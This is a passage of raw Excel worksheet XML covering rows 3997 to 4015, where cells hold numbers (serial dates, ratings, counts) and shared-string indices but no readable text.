      <c r="W3997" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3997" s="12">
        <v>2</v>
      </c>
      <c r="Y3997" s="12" t="s">
        <v>25702</v>
      </c>
    </row>
    <row r="3998" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3998" s="12">
        <v>42973</v>
      </c>
      <c r="B3998" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3998" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3998" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F3998" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3998" s="12" t="s">
        <v>25703</v>
      </c>
      <c r="H3998" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3998" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3998" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K3998" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3998" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3998" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3998" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3998" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3998" s="12">
        <v>3.3</v>
      </c>
      <c r="Q3998" s="12">
        <v>3.3</v>
      </c>
      <c r="R3998" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3998" s="12" t="s">
        <v>25704</v>
      </c>
      <c r="T3998" s="12" t="s">
        <v>25705</v>
      </c>
      <c r="U3998" s="12" t="s">
        <v>25706</v>
      </c>
      <c r="V3998" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W3998" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3998" s="12">
        <v>10</v>
      </c>
      <c r="Y3998" s="12" t="s">
        <v>25707</v>
      </c>
    </row>
    <row r="3999" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3999" s="12">
        <v>42978</v>
      </c>
      <c r="B3999" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3999" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E3999" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F3999" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3999" s="12" t="s">
        <v>25708</v>
      </c>
      <c r="H3999" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3999" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3999" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3999" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3999" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3999" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3999" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3999" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3999" s="12" t="s">
        <v>25709</v>
      </c>
      <c r="Q3999" s="12">
        <v>3.3</v>
      </c>
      <c r="R3999" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3999" s="12" t="s">
        <v>25710</v>
      </c>
      <c r="T3999" s="12" t="s">
        <v>25711</v>
      </c>
      <c r="U3999" s="12" t="s">
        <v>25712</v>
      </c>
      <c r="V3999" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3999" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3999" s="12">
        <v>79</v>
      </c>
      <c r="Y3999" s="12" t="s">
        <v>25713</v>
      </c>
    </row>
    <row r="4000" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4000" s="12">
        <v>42979</v>
      </c>
      <c r="B4000" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D4000" s="12" t="s">
        <v>30900</v>
      </c>
      <c r="E4000" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4000" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4000" s="12" t="s">
        <v>25714</v>
      </c>
      <c r="H4000" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4000" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4000" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K4000" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4000" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4000" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4000" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4000" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4000" s="12" t="s">
        <v>25715</v>
      </c>
      <c r="Q4000" s="12">
        <v>3.2</v>
      </c>
      <c r="R4000" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4000" s="12" t="s">
        <v>25716</v>
      </c>
      <c r="T4000" s="12" t="s">
        <v>25717</v>
      </c>
      <c r="U4000" s="12" t="s">
        <v>25718</v>
      </c>
      <c r="V4000" s="12" t="s">
        <v>24963</v>
      </c>
      <c r="W4000" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4000" s="12">
        <v>12</v>
      </c>
      <c r="Y4000" s="12" t="s">
        <v>25719</v>
      </c>
    </row>
    <row r="4001" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4001" s="12">
        <v>42981</v>
      </c>
      <c r="B4001" s="12" t="s">
        <v>30762</v>
      </c>
      <c r="C4001" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4001" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4001" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4001" s="12" t="s">
        <v>30755</v>
      </c>
      <c r="G4001" s="12" t="s">
        <v>25720</v>
      </c>
      <c r="H4001" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4001" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4001" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K4001" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4001" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4001" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4001" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4001" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4001" s="12" t="s">
        <v>25721</v>
      </c>
      <c r="Q4001" s="12" t="s">
        <v>28285</v>
      </c>
      <c r="R4001" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4001" s="12" t="s">
        <v>25722</v>
      </c>
      <c r="T4001" s="12" t="s">
        <v>25723</v>
      </c>
      <c r="U4001" s="12" t="s">
        <v>25724</v>
      </c>
      <c r="V4001" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W4001" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4001" s="12">
        <v>6</v>
      </c>
      <c r="Y4001" s="12" t="s">
        <v>25725</v>
      </c>
    </row>
    <row r="4002" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4002" s="12">
        <v>43012</v>
      </c>
      <c r="B4002" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4002" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4002" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4002" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4002" s="12" t="s">
        <v>25732</v>
      </c>
      <c r="H4002" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4002" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4002" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4002" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4002" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4002" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4002" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4002" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4002" s="12" t="s">
        <v>25733</v>
      </c>
      <c r="Q4002" s="12">
        <v>3.3</v>
      </c>
      <c r="R4002" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4002" s="12" t="s">
        <v>25734</v>
      </c>
      <c r="T4002" s="12" t="s">
        <v>25735</v>
      </c>
      <c r="U4002" s="12" t="s">
        <v>25638</v>
      </c>
      <c r="V4002" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W4002" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4002" s="12">
        <v>15</v>
      </c>
      <c r="Y4002" s="12" t="s">
        <v>25736</v>
      </c>
    </row>
    <row r="4003" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4003" s="12">
        <v>43024</v>
      </c>
      <c r="B4003" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4003" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4003" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4003" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4003" s="12" t="s">
        <v>25738</v>
      </c>
      <c r="H4003" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4003" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4003" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4003" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4003" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4003" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4003" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4003" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4003" s="12" t="s">
        <v>25737</v>
      </c>
      <c r="Q4003" s="12">
        <v>3.4</v>
      </c>
      <c r="R4003" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4003" s="12" t="s">
        <v>25739</v>
      </c>
      <c r="T4003" s="12" t="s">
        <v>21598</v>
      </c>
      <c r="U4003" s="12" t="s">
        <v>25740</v>
      </c>
      <c r="V4003" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W4003" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4003" s="12">
        <v>6</v>
      </c>
      <c r="Y4003" s="12" t="s">
        <v>25741</v>
      </c>
    </row>
    <row r="4004" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4004" s="12">
        <v>43027</v>
      </c>
      <c r="B4004" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D4004" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="F4004" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4004" s="12" t="s">
        <v>25742</v>
      </c>
      <c r="H4004" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4004" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4004" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4004" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4004" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4004" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4004" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4004" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4004" s="12" t="s">
        <v>23243</v>
      </c>
      <c r="Q4004" s="12">
        <v>3.4</v>
      </c>
      <c r="R4004" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4004" s="12" t="s">
        <v>25743</v>
      </c>
      <c r="T4004" s="12" t="s">
        <v>21598</v>
      </c>
      <c r="U4004" s="12" t="s">
        <v>25744</v>
      </c>
      <c r="V4004" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W4004" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4004" s="12">
        <v>3</v>
      </c>
      <c r="Y4004" s="12" t="s">
        <v>25745</v>
      </c>
    </row>
    <row r="4005" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4005" s="12">
        <v>43071</v>
      </c>
      <c r="B4005" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4005" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4005" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4005" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4005" s="12" t="s">
        <v>25746</v>
      </c>
      <c r="H4005" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4005" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4005" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4005" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4005" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4005" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4005" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4005" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4005" s="12" t="s">
        <v>25747</v>
      </c>
      <c r="Q4005" s="12">
        <v>3.4</v>
      </c>
      <c r="R4005" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4005" s="12" t="s">
        <v>25748</v>
      </c>
      <c r="T4005" s="12" t="s">
        <v>12529</v>
      </c>
      <c r="U4005" s="12" t="s">
        <v>25749</v>
      </c>
      <c r="V4005" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W4005" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4005" s="12">
        <v>23</v>
      </c>
      <c r="Y4005" s="12" t="s">
        <v>25750</v>
      </c>
    </row>
    <row r="4006" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4006" s="12">
        <v>43085</v>
      </c>
      <c r="B4006" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C4006" s="12" t="s">
        <v>30805</v>
      </c>
      <c r="D4006" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E4006" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4006" s="12" t="s">
        <v>30809</v>
      </c>
      <c r="G4006" s="12" t="s">
        <v>25751</v>
      </c>
      <c r="H4006" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4006" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4006" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K4006" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4006" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4006" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4006" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4006" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4006" s="12" t="s">
        <v>25752</v>
      </c>
      <c r="Q4006" s="12">
        <v>3.4</v>
      </c>
      <c r="R4006" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4006" s="12" t="s">
        <v>25753</v>
      </c>
      <c r="T4006" s="12" t="s">
        <v>21844</v>
      </c>
      <c r="U4006" s="12" t="s">
        <v>25754</v>
      </c>
      <c r="V4006" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W4006" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4006" s="12">
        <v>2</v>
      </c>
      <c r="Y4006" s="12" t="s">
        <v>25755</v>
      </c>
    </row>
    <row r="4007" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4007" s="12">
        <v>43088</v>
      </c>
      <c r="B4007" s="12" t="s">
        <v>30114</v>
      </c>
      <c r="C4007" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4007" s="12" t="s">
        <v>30119</v>
      </c>
      <c r="E4007" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4007" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4007" s="12" t="s">
        <v>25756</v>
      </c>
      <c r="H4007" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4007" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4007" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4007" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4007" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4007" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4007" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4007" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4007" s="12" t="s">
        <v>25757</v>
      </c>
      <c r="Q4007" s="12">
        <v>3.2</v>
      </c>
      <c r="R4007" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4007" s="12" t="s">
        <v>25758</v>
      </c>
      <c r="T4007" s="12" t="s">
        <v>25759</v>
      </c>
      <c r="U4007" s="12" t="s">
        <v>25760</v>
      </c>
      <c r="V4007" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W4007" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4007" s="12">
        <v>7</v>
      </c>
      <c r="Y4007" s="12" t="s">
        <v>25761</v>
      </c>
    </row>
    <row r="4008" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4008" s="12">
        <v>43099</v>
      </c>
      <c r="B4008" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4008" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4008" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4008" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4008" s="12" t="s">
        <v>25762</v>
      </c>
      <c r="H4008" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4008" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4008" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K4008" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4008" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4008" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4008" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4008" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4008" s="12" t="s">
        <v>25763</v>
      </c>
      <c r="Q4008" s="12">
        <v>3.4</v>
      </c>
      <c r="R4008" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4008" s="12" t="s">
        <v>25764</v>
      </c>
      <c r="T4008" s="12" t="s">
        <v>16247</v>
      </c>
      <c r="U4008" s="12" t="s">
        <v>25765</v>
      </c>
      <c r="V4008" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W4008" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4008" s="12">
        <v>6</v>
      </c>
      <c r="Y4008" s="12" t="s">
        <v>25766</v>
      </c>
    </row>
    <row r="4009" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4009" s="12">
        <v>43139</v>
      </c>
      <c r="B4009" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C4009" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4009" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4009" s="12" t="s">
        <v>30563</v>
      </c>
      <c r="G4009" s="12" t="s">
        <v>25767</v>
      </c>
      <c r="H4009" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4009" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J4009" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4009" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4009" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4009" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4009" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4009" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4009" s="12" t="s">
        <v>25763</v>
      </c>
      <c r="Q4009" s="12">
        <v>3.4</v>
      </c>
      <c r="R4009" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4009" s="12" t="s">
        <v>25768</v>
      </c>
      <c r="T4009" s="12" t="s">
        <v>25769</v>
      </c>
      <c r="U4009" s="12" t="s">
        <v>25770</v>
      </c>
      <c r="V4009" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W4009" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4009" s="12">
        <v>10</v>
      </c>
      <c r="Y4009" s="12" t="s">
        <v>25771</v>
      </c>
    </row>
    <row r="4010" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4010" s="12">
        <v>43144</v>
      </c>
      <c r="B4010" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4010" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4010" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4010" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4010" s="12" t="s">
        <v>25772</v>
      </c>
      <c r="H4010" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4010" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4010" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K4010" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4010" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4010" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4010" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4010" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4010" s="12" t="s">
        <v>25656</v>
      </c>
      <c r="Q4010" s="12">
        <v>3.4</v>
      </c>
      <c r="R4010" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4010" s="12" t="s">
        <v>25773</v>
      </c>
      <c r="T4010" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U4010" s="12" t="s">
        <v>25774</v>
      </c>
      <c r="V4010" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W4010" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4010" s="12">
        <v>9</v>
      </c>
      <c r="Y4010" s="12" t="s">
        <v>25775</v>
      </c>
    </row>
    <row r="4011" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4011" s="12">
        <v>43162</v>
      </c>
      <c r="B4011" s="12" t="s">
        <v>30235</v>
      </c>
      <c r="C4011" s="12" t="s">
        <v>30236</v>
      </c>
      <c r="D4011" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4011" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4011" s="12" t="s">
        <v>25776</v>
      </c>
      <c r="H4011" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4011" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4011" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4011" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4011" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4011" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4011" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4011" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4011" s="12" t="s">
        <v>25004</v>
      </c>
      <c r="Q4011" s="12">
        <v>3.3</v>
      </c>
      <c r="R4011" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4011" s="12" t="s">
        <v>25777</v>
      </c>
      <c r="T4011" s="12" t="s">
        <v>25778</v>
      </c>
      <c r="U4011" s="12" t="s">
        <v>25779</v>
      </c>
      <c r="V4011" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="W4011" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4011" s="12">
        <v>23</v>
      </c>
      <c r="Y4011" s="12" t="s">
        <v>25780</v>
      </c>
    </row>
    <row r="4012" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4012" s="12">
        <v>43163</v>
      </c>
      <c r="B4012" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4012" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4012" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4012" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4012" s="12" t="s">
        <v>25781</v>
      </c>
      <c r="H4012" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4012" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4012" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4012" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4012" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4012" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4012" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4012" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4012" s="12" t="s">
        <v>25782</v>
      </c>
      <c r="Q4012" s="12">
        <v>3.3</v>
      </c>
      <c r="R4012" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4012" s="12" t="s">
        <v>25783</v>
      </c>
      <c r="T4012" s="12" t="s">
        <v>25784</v>
      </c>
      <c r="U4012" s="12" t="s">
        <v>25785</v>
      </c>
      <c r="V4012" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W4012" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4012" s="12">
        <v>39</v>
      </c>
      <c r="Y4012" s="12" t="s">
        <v>25786</v>
      </c>
    </row>
    <row r="4013" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4013" s="12">
        <v>43168</v>
      </c>
      <c r="B4013" s="12" t="s">
        <v>30120</v>
      </c>
      <c r="D4013" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4013" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4013" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4013" s="12" t="s">
        <v>25787</v>
      </c>
      <c r="H4013" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4013" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4013" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4013" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4013" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4013" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4013" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4013" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4013" s="12" t="s">
        <v>25788</v>
      </c>
      <c r="Q4013" s="12">
        <v>3.2</v>
      </c>
      <c r="R4013" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4013" s="12" t="s">
        <v>25789</v>
      </c>
      <c r="T4013" s="12" t="s">
        <v>25790</v>
      </c>
      <c r="U4013" s="12" t="s">
        <v>25791</v>
      </c>
      <c r="V4013" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4013" s="12" t="s">
        <v>25792</v>
      </c>
      <c r="X4013" s="12">
        <v>28</v>
      </c>
      <c r="Y4013" s="12" t="s">
        <v>25793</v>
      </c>
    </row>
    <row r="4014" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4014" s="12">
        <v>43180</v>
      </c>
      <c r="B4014" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4014" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4014" s="12" t="s">
        <v>31446</v>
      </c>
      <c r="F4014" s="12" t="s">
        <v>31357</v>
      </c>
      <c r="G4014" s="12" t="s">
        <v>25794</v>
      </c>
      <c r="H4014" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4014" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4014" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4014" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4014" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4014" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4014" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4014" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4014" s="12" t="s">
        <v>25782</v>
      </c>
      <c r="Q4014" s="12">
        <v>3.3</v>
      </c>
      <c r="R4014" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4014" s="12" t="s">
        <v>25795</v>
      </c>
      <c r="T4014" s="12" t="s">
        <v>25796</v>
      </c>
      <c r="U4014" s="12" t="s">
        <v>25706</v>
      </c>
      <c r="V4014" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4014" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4014" s="12">
        <v>12</v>
      </c>
      <c r="Y4014" s="12" t="s">
        <v>25797</v>
      </c>
    </row>
    <row r="4015" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4015" s="12">
        <v>43187</v>
      </c>
      <c r="B4015" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4015" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4015" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4015" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4015" s="12" t="s">
        <v>25798</v>
      </c>
      <c r="H4015" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4015" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4015" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4015" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4015" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4015" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4015" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4015" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4015" s="12" t="s">
        <v>25799</v>
      </c>
      <c r="Q4015" s="12">
        <v>3.3</v>
      </c>
      <c r="R4015" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4015" s="12" t="s">
        <v>25800</v>
      </c>
      <c r="T4015" s="12" t="s">
        <v>25801</v>
      </c>
      <c r="U4015" s="12" t="s">
        <v>25802</v>
      </c>
      <c r="V4015" s="12" t="s">
        <v>2494</v>
      </c>
      <c r="W4015" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4015" s="12">
        <v>29</v>
      </c>
      <c r="Y4015" s="12" t="s">
        <v>25803</v>
